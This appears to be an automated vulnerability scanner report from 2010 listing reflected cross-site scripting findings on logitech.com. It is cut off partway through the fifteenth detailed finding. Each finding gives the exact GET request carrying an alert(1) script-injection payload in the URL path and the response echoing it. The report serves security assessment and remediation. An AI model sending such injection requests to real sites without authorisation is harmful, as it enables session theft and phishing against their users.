1.1482. http://www.logitech.com/javascript/v2/cmn/lib/plugins/third-party/sayt.js [REST URL parameter 7]

1.1483. http://www.logitech.com/javascript/v2/combined.js [REST URL parameter 1]

1.1484. http://www.logitech.com/javascript/v2/combined.js [REST URL parameter 1]

1.1485. http://www.logitech.com/javascript/v2/combined.js [REST URL parameter 2]

1.1486. http://www.logitech.com/javascript/v2/combined.js [REST URL parameter 2]

1.1487. http://www.logitech.com/javascript/v2/combined.js [REST URL parameter 3]

1.1488. http://www.logitech.com/javascript/v2/combined.js [REST URL parameter 3]

1.1489. http://www.logitech.com/javascript/v2/gomez.js [REST URL parameter 1]

1.1490. http://www.logitech.com/javascript/v2/gomez.js [REST URL parameter 1]

1.1491. http://www.logitech.com/javascript/v2/gomez.js [REST URL parameter 2]

1.1492. http://www.logitech.com/javascript/v2/gomez.js [REST URL parameter 2]

1.1493. http://www.logitech.com/javascript/v2/gomez.js [REST URL parameter 3]

1.1494. http://www.logitech.com/javascript/v2/gomez.js [REST URL parameter 3]

1.1495. http://www.logitech.com/javascript/v2/homepage_full.js [REST URL parameter 1]

1.1496. http://www.logitech.com/javascript/v2/homepage_full.js [REST URL parameter 1]

1.1497. http://www.logitech.com/javascript/v2/homepage_full.js [REST URL parameter 2]

1.1498. http://www.logitech.com/javascript/v2/homepage_full.js [REST URL parameter 2]

1.1499. http://www.logitech.com/javascript/v2/homepage_full.js [REST URL parameter 3]

1.1500. http://www.logitech.com/javascript/v2/homepage_full.js [REST URL parameter 3]

1.1501. http://www.logitech.com/javascript/v2/pagination.js [REST URL parameter 1]

1.1502. http://www.logitech.com/javascript/v2/pagination.js [REST URL parameter 1]

1.1503. http://www.logitech.com/javascript/v2/pagination.js [REST URL parameter 2]

1.1504. http://www.logitech.com/javascript/v2/pagination.js [REST URL parameter 2]

1.1505. http://www.logitech.com/javascript/v2/pagination.js [REST URL parameter 3]

1.1506. http://www.logitech.com/javascript/v2/pagination.js [REST URL parameter 3]

1.1507. http://www.logitech.com/javascript/v2/subnavigation.js [REST URL parameter 1]

1.1508. http://www.logitech.com/javascript/v2/subnavigation.js [REST URL parameter 1]

1.1509. http://www.logitech.com/javascript/v2/subnavigation.js [REST URL parameter 2]

1.1510. http://www.logitech.com/javascript/v2/subnavigation.js [REST URL parameter 2]

1.1511. http://www.logitech.com/javascript/v2/subnavigation.js [REST URL parameter 3]

1.1512. http://www.logitech.com/javascript/v2/subnavigation.js [REST URL parameter 3]

1.1513. http://www.logitech.com/javascript/v2/webtrends.js [REST URL parameter 1]

1.1514. http://www.logitech.com/javascript/v2/webtrends.js [REST URL parameter 1]

1.1515. http://www.logitech.com/javascript/v2/webtrends.js [REST URL parameter 2]

1.1516. http://www.logitech.com/javascript/v2/webtrends.js [REST URL parameter 2]

1.1517. http://www.logitech.com/javascript/v2/webtrends.js [REST URL parameter 3]

1.1518. http://www.logitech.com/javascript/v2/webtrends.js [REST URL parameter 3]

1.1519. http://www.logitech.com/robots.txt [REST URL parameter 1]

1.1520. http://www.logitech.com/robots.txt [REST URL parameter 1]

1.1521. http://www.logitech.com/thank_you [REST URL parameter 1]

1.1522. http://www.logitech.com/thank_you [REST URL parameter 1]



1. Cross-site scripting (reflected)
There are 1522 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.logitech.com/349/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /349/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7784</script><script>alert(1)</script>9a6e0835833 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /349f7784</script><script>alert(1)</script>9a6e0835833/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349f7784</script><script>alert(1)</script>9a6e0835833' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.2. http://www.logitech.com/349/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /349/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e226"><script>alert(1)</script>b89149fdcec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /3498e226"><script>alert(1)</script>b89149fdcec/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="3498e226"><script>alert(1)</script>b89149fdcec">
...[SNIP]...

1.3. http://www.logitech.com/349/7073 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /349/7073

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc92e</script><script>alert(1)</script>f5f38212be6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /349fc92e</script><script>alert(1)</script>f5f38212be6/7073 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:18 GMT
Connection: keep-alive
Content-Length: 31370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349fc92e</script><script>alert(1)</script>f5f38212be6/7073' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.4. http://www.logitech.com/349/7073 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /349/7073

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b6a0"><script>alert(1)</script>abef1686553 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3495b6a0"><script>alert(1)</script>abef1686553/7073 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:12 GMT
Connection: keep-alive
Content-Length: 31338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="3495b6a0"><script>alert(1)</script>abef1686553/7073">
...[SNIP]...

1.5. http://www.logitech.com/349/7073 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /349/7073

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0dae"><script>alert(1)</script>d1c78e40ff3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /349/7073b0dae"><script>alert(1)</script>d1c78e40ff3 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:19 GMT
Connection: keep-alive
Content-Length: 31338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="349/7073b0dae"><script>alert(1)</script>d1c78e40ff3">
...[SNIP]...

1.6. http://www.logitech.com/349/7073 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /349/7073

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c909b</script><script>alert(1)</script>24401b002b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /349/7073c909b</script><script>alert(1)</script>24401b002b1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:22 GMT
Connection: keep-alive
Content-Length: 31370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349/7073c909b</script><script>alert(1)</script>24401b002b1' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.7. http://www.logitech.com/[{lclid}]/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36661"><script>alert(1)</script>1e4bdda8a64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /[{lclid}]36661"><script>alert(1)</script>1e4bdda8a64/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="[{lclid}]36661"><script>alert(1)</script>1e4bdda8a64">
...[SNIP]...

1.8. http://www.logitech.com/[{lclid}]/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8da1</script><script>alert(1)</script>45daf56d365 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /[{lclid}]b8da1</script><script>alert(1)</script>45daf56d365/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','[{lclid}]b8da1</script><script>alert(1)</script>45daf56d365' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.9. http://www.logitech.com/[{lclid}]/69/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36a45"%3b5f92b547f49 was submitted in the REST URL parameter 1. This input was echoed as 36a45";5f92b547f49 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /[{lclid}]36a45"%3b5f92b547f49/69/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Apache
AK-control: no-store
Date: Fri, 12 Nov 2010 13:03:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/[{lclid}]36a45";5f92b547f49/69";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.10. http://www.logitech.com/[{lclid}]/69/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f73"><script>alert(1)</script>cf1f5a43e78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /[{lclid}]11f73"><script>alert(1)</script>cf1f5a43e78/69/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:03:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="[{lclid}]11f73"><script>alert(1)</script>cf1f5a43e78/69">
...[SNIP]...

1.11. http://www.logitech.com/[{lclid}]/69/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92e2f</script><script>alert(1)</script>ab14f89b30d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /[{lclid}]92e2f</script><script>alert(1)</script>ab14f89b30d/69/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:03:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','[{lclid}]92e2f</script><script>alert(1)</script>ab14f89b30d/69' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcs
...[SNIP]...

1.12. http://www.logitech.com/[{lclid}]/69/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f1e8</script><script>alert(1)</script>c66fc837737 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /[{lclid}]/691f1e8</script><script>alert(1)</script>c66fc837737/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:03:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','[{lclid}]/691f1e8</script><script>alert(1)</script>c66fc837737' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.13. http://www.logitech.com/[{lclid}]/69/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9923"><script>alert(1)</script>992f80526f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /[{lclid}]/69d9923"><script>alert(1)</script>992f80526f1/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:03:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="[{lclid}]/69d9923"><script>alert(1)</script>992f80526f1">
...[SNIP]...

1.14. http://www.logitech.com/[{lclid}]/69/7112 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/7112

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a47a2"><script>alert(1)</script>d3f9bf6bc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /[{lclid}]a47a2"><script>alert(1)</script>d3f9bf6bc4/69/7112 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="[{lclid}]a47a2"><script>alert(1)</script>d3f9bf6bc4/69/7112">
...[SNIP]...

1.15. http://www.logitech.com/[{lclid}]/69/7112 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/7112

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 203c0</script><script>alert(1)</script>762ee0b3a24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

